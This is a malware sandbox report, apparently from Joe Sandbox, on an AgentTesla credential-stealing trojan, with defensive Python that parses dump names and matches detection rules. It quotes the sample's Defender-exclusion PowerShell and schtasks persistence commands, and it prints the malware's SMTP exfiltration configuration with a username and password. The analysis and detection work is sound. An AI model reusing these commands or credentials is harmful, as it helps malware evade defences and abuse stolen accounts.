
Windows Analysis Report 03SPwb995m

Overview

General Information

Sample Name: 03SPwb995m (renamed file extension from none to exe)
Analysis ID: 528805
MD5: 815982590de5e574abb8a0310826e200
SHA1: 6c41343a2e25f932f901e53e615cc083209f6a65
SHA256: 56960095ea2eda1c680f9df0937a792e9bca7af4922931540688097e6d2a43bb
Tags: 32, exe, trojan

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 03SPwb995m.exe (PID: 1364 cmdline: "C:\Users\user\Desktop\03SPwb995m.exe" MD5: 815982590DE5E574ABB8A0310826E200)
    • powershell.exe (PID: 5776 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5732 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 03SPwb995m.exe (PID: 5596 cmdline: C:\Users\user\Desktop\03SPwb995m.exe MD5: 815982590DE5E574ABB8A0310826E200)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(5 of 15 entries shown)

            Unpacked PEs

Source | Rule | Description | Author
0.2.03SPwb995m.exe.40065a0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.03SPwb995m.exe.40065a0.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
8.0.03SPwb995m.exe.400000.12.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.0.03SPwb995m.exe.400000.12.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
8.2.03SPwb995m.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 15 entries shown)
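The dump identifiers in the two tables above encode where in the process each Yara hit was taken. The following Python, added here as an illustration and not part of the Joe Sandbox report, decodes that naming scheme and lists the dumps that came from execute-read-write memory. It assumes (this example's reading of the format, not something the page states) that the dotted fields of a .sdmp name are process index, dump stage (0 = process start, 2 = process end, 3 = during execution), dump id, base address, page protection as the Win32 PAGE_* value, and a memory-type field that is carried through undecoded. Run on the rows above it singles out process index 8, the second 03SPwb995m.exe instance that the parent created in suspended mode, whose PAGE_EXECUTE_READWRITE region at 0x402000 already matches AgentTesla at stage 0, i.e. before that process had run any of its own code; that is the pattern of a child whose image was overwritten by its parent rather than a module loaded from disk.

```python
from dataclasses import dataclass
from typing import List

# Win32 page-protection constants (winnt.h). Assumption of this example:
# the fifth dotted field of a .sdmp name holds one of these values.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Assumed meaning of the second field (stage at which the dump was taken).
STAGE = {0: "process start", 2: "process end", 3: "during execution"}


@dataclass
class Dump:
    process_index: int
    stage: int
    dump_id: int
    base: int
    protection: int
    mem_type: int
    rule: str = ""

    @property
    def is_rwx(self) -> bool:
        return self.protection == 0x40

    def describe(self) -> str:
        prot = PAGE_PROTECTION.get(self.protection, hex(self.protection))
        stage = STAGE.get(self.stage, f"stage {self.stage}")
        return f"proc {self.process_index} @{self.base:#x} {prot} ({stage}) {self.rule}".rstrip()


def parse_dump_name(name: str, rule: str = "") -> Dump:
    """Parse '<proc>.<stage>.<id>.<base>.<prot>.<type>.sdmp' (assumed layout)."""
    if not name.endswith(".sdmp"):
        raise ValueError(f"not a memory dump name: {name}")
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError(f"expected 6 dotted fields, got {len(fields)}: {name}")
    proc, stage, dump_id = (int(f, 10) for f in fields[:3])
    base, prot, mem_type = (int(f, 16) for f in fields[3:])
    return Dump(proc, stage, dump_id, base, prot, mem_type, rule)


# Rows transcribed from the "Memory Dumps" table of this report.
YARA_HITS = [
    ("00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp", "JoeSecurity_AntiVM_3"),
    ("00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp", "JoeSecurity_AgentTesla_1"),
    ("00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp", "JoeSecurity_AgentTesla_2"),
    ("00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp", "JoeSecurity_AgentTesla_1"),
    ("00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp", "JoeSecurity_AgentTesla_2"),
]


def rwx_regions(hits) -> List[Dump]:
    """Dumps taken from execute-read-write regions, de-duplicated by
    (process, stage, base): these are the ones worth carving a PE from."""
    seen, out = set(), []
    for name, rule in hits:
        d = parse_dump_name(name, rule)
        key = (d.process_index, d.stage, d.base)
        if d.is_rwx and key not in seen:
            seen.add(key)
            out.append(d)
    return out


def payload_present_at_start(hits, proc: int) -> bool:
    """True if an RWX region in `proc` already matched a rule at stage 0,
    i.e. the code was placed there before the process ran."""
    return any(d.stage == 0 for d in rwx_regions(hits) if d.process_index == proc)


if __name__ == "__main__":
    for d in rwx_regions(YARA_HITS):
        print(d.describe())
    print("process 8 carried the payload before it started:",
          payload_present_at_start(YARA_HITS, 8))
```

The same parser applies to the "Unpacked PEs" names once the `.unpack` suffix and the embedded file name are stripped; the useful triage rule is the one `payload_present_at_start` encodes: a process whose start-of-life dump already matches the final payload did not unpack it itself.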

                      Sigma Overview

                      System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, ProcessId: 5732
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 5776
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 5776
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132823406173533744.5776.DefaultAppDomain.powershell
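The two process-creation matches above come down to string conditions on the command line plus parent context: schtasks.exe registering a task from an XML in the user's AppData\Local\Temp, and PowerShell calling Add-MpPreference with an exclusion parameter. The following Python is added here as an illustration; it is not part of the Joe Sandbox report or of the Sigma project, and its two match functions are this example's approximation of the rule logic rather than the rules' exact selection lists. It runs over constructed event records (the first two transcribed from the process tree above, the other two benign controls invented for the example) using the Sysmon-style keys that appear in the Sigma output, and then adds a correlation step of its own: one parent spawning both a persistence and a defence-evasion child is a far stronger signal than either event alone.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events. The first two are transcribed from the
# process tree in this report; the last two are benign controls made up for
# the example and do not come from the report.
EVENTS: List[Dict[str, str]] = [
    {
        "ProcessId": "5776",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe',
        "ParentImage": r"C:\Users\user\Desktop\03SPwb995m.exe",
        "ParentProcessId": "1364",
    },
    {
        "ProcessId": "5732",
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "CommandLine": r'C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp',
        "ParentImage": r"C:\Users\user\Desktop\03SPwb995m.exe",
        "ParentProcessId": "1364",
    },
    {   # control: task created from a non-user, non-temp path
        "ProcessId": "4100",
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentProcessId": "900",
    },
    {   # control: PowerShell reading, not changing, Defender preferences
        "ProcessId": "4200",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe Get-MpPreference",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentProcessId": "3000",
    },
]

# schtasks.exe /Create ... /XML <file under C:\Users\<name>\AppData\Local\Temp\>
_TEMP_XML = re.compile(
    r"/create\b.*?/xml\s+\"?[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\",
    re.IGNORECASE,
)

# Add-MpPreference with any of its exclusion parameters (path, process,
# extension, IP address); the report shows the -ExclusionPath form.
_DEFENDER_EXCL = re.compile(
    r"add-mppreference\b.*?-exclusion(path|process|extension|ipaddress)\b",
    re.IGNORECASE,
)


def is_schtasks_from_user_temp(ev: Dict[str, str]) -> bool:
    return ev["Image"].lower().endswith("\\schtasks.exe") and bool(
        _TEMP_XML.search(ev["CommandLine"]))


def is_defender_exclusion(ev: Dict[str, str]) -> bool:
    return ev["Image"].lower().endswith("\\powershell.exe") and bool(
        _DEFENDER_EXCL.search(ev["CommandLine"]))


def rules_for(ev: Dict[str, str]) -> set:
    rules = set()
    if is_schtasks_from_user_temp(ev):
        rules.add("schtasks_from_user_temp")
    if is_defender_exclusion(ev):
        rules.add("powershell_defender_exclusion")
    return rules


def matches(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(rule_name, ProcessId) for every event that trips a rule."""
    return [(rule, ev["ProcessId"]) for ev in events for rule in sorted(rules_for(ev))]


def correlate_by_parent(events: List[Dict[str, str]]) -> Dict[Tuple[str, str], set]:
    """Parents whose children tripped at least two distinct rules. This
    correlation is the example's own addition, not a rule from the report."""
    by_parent: Dict[Tuple[str, str], set] = {}
    for ev in events:
        rules = rules_for(ev)
        if rules:
            by_parent.setdefault((ev["ParentProcessId"], ev["ParentImage"]), set()).update(rules)
    return {k: v for k, v in by_parent.items() if len(v) >= 2}


if __name__ == "__main__":
    for rule, pid in matches(EVENTS):
        print(f"{rule}: PID {pid}")
    for (ppid, pimg), rules in correlate_by_parent(EVENTS).items():
        print(f"parent {pimg} (PID {ppid}) triggered {sorted(rules)}")
```

Note that the `Image` field is the SysWOW64 binary while the command line names System32: the 32-bit sample went through WOW64 file-system redirection, so a rule keyed only on the `C:\Windows\System32\` prefix of the command line would still fire, but one keyed on the image path must allow both directories.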

                      Jbx Signature Overview

                      AV Detection:

Found malware configuration
Source: 8.0.03SPwb995m.exe.400000.10.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}
Multi AV Scanner detection for submitted file
Source: 03SPwb995m.exe | Virustotal: Detection: 22%
Source: 03SPwb995m.exe | ReversingLabs: Detection: 28%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe | Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe | ReversingLabs: Detection: 28%
Source: 8.0.03SPwb995m.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.2.03SPwb995m.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.03SPwb995m.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.03SPwb995m.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.03SPwb995m.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.03SPwb995m.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 03SPwb995m.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 03SPwb995m.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49833 -> 208.91.199.223:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49834 -> 208.91.199.224:587
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | IP Address: 208.91.199.223
Source: Joe Sandbox View | IP Address: 208.91.199.224
Source: global traffic | TCP traffic: 192.168.2.4:49833 -> 208.91.199.223:587 (2 times)
Source: global traffic | TCP traffic: 192.168.2.4:49834 -> 208.91.199.224:587 (2 times)
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921843959.0000000002EFB000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921764899.0000000002EE5000.00000004.00000001.sdmp | String found in binary or memory: http://1pbBaOuWGX2iibYLF.net
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: http://GwvXXB.com
Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921914863.0000000002F13000.00000004.00000001.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: 03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, 03SPwb995m.exe, 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: us2.smtp.mailhostbox.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\03SPwb995m.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\03SPwb995m.exe
Source: C:\Users\user\Desktop\03SPwb995m.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary:

.NET source code contains very large array initializations
Source: 8.0.03SPwb995m.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
Source: 8.2.03SPwb995m.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
Source: 03SPwb995m.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 0_2_008FA2A9
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 0_2_02BBDC0C
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 0_2_008FA035
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0078A2A9
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_02964920
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_029648F2
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0296DDD0
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0078A035
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FCE676
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FCE67A
Source: 03SPwb995m.exe, 00000000.00000002.677498178.00000000009B0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000000.00000003.654896294.0000000003E7B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000000.00000003.677046086.000000000100F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000000.00000002.681380062.0000000005F70000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000008.00000000.674499153.0000000000840000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000008.00000002.917260578.00000000009D8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 03SPwb995m.exe
Source: 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
Source: 03SPwb995m.exe | Binary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe 56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
Source: 03SPwb995m.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gZfDBpJYZ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 03SPwb995m.exe | Virustotal: Detection: 22%
Source: 03SPwb995m.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\03SPwb995m.exe | File read: C:\Users\user\Desktop\03SPwb995m.exe
Source: 03SPwb995m.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\03SPwb995m.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\03SPwb995m.exe "C:\Users\user\Desktop\03SPwb995m.exe"
Source: C:\Users\user\Desktop\03SPwb995m.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03SPwb995m.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03SPwb995m.exe | Process created: C:\Users\user\Desktop\03SPwb995m.exe C:\Users\user\Desktop\03SPwb995m.exe
Source: C:\Users\user\Desktop\03SPwb995m.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | File created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
Source: C:\Users\user\Desktop\03SPwb995m.exe | File created: C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/9@2/2
Source: C:\Users\user\Desktop\03SPwb995m.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\03SPwb995m.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\03SPwb995m.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
Source: C:\Users\user\Desktop\03SPwb995m.exe | Mutant created: \Sessions\1\BaseNamedObjects\CVJFnsnVFoXysEkzODvWP
Source: 8.0.03SPwb995m.exe.400000.10.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 times)
Source: 8.2.03SPwb995m.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\03SPwb995m.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 03SPwb995m.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 03SPwb995m.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

.NET source code contains potential unpacker
Source: 03SPwb995m.exe, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
